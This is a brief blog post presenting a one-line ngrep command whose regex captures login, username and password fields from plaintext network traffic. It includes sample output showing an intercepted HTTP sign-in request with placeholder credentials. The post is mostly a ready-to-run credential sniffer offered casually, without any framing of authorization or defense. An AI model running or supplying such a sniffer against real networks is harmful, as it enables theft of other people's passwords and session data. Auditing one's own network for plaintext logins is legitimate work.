Quick and dirty ngrep credential (username/password) sniffer
Some time ago I’ve posted a quick (and dirty too!) command-liner using tcpdump to sniff plaintext credentials over the wire.
Now I’ve acomplished the same thing with a shorter regex and ngrep tool.
|
1
|
ngrep '[&\s?](?:login|user(?:name|)|p(ass(?:word|wd|)|w|wd))[\s:=]\s?([^&\s]*)' -q -i
|
Where -i is for case-insensitive and -q for more precise output. See man ngrep for additional information.
And the output is as follows:
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
interface: eth0 (10.1.1.0/255.255.255.0)
match: [&\s?](?:login|user(?:name|)|p(ass(?:word|wd|)|w|wd))[\s:=]\s?([^&\s]*)
T 10.1.1.111:49196 -> 96.126.98.110:80 [AP]
POST /users/signin HTTP/1.1..Host: www.commandlinefu.com..Connection: ke
ep-alive..Content-Length: 43..Cache-Control: max-age=0..Origin: http://w
ww.commandlinefu.com..User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleW
ebKit/536.11 (KHTML, like Gecko) Ubuntu/12.04 Chromium/20.0.1132.47 Chro
me/20.0.1132.47 Safari/536.11..Content-Type: application/x-www-form-urle
ncoded..Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/
*;q=0.8..Referer: http://www.commandlinefu.com/users/signin..Accept-Enco
ding: gzip,deflate,sdch..Accept-Language: en-US,en;q=0.8,pt-BR;q=0.6,pt;
q=0.4..Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3..Cookie: XXXXXXXXX
XXXXXXXXXXXX....username=aaaa&password=bbbbb&submit=Let+me+in%21
|
Hope that helps!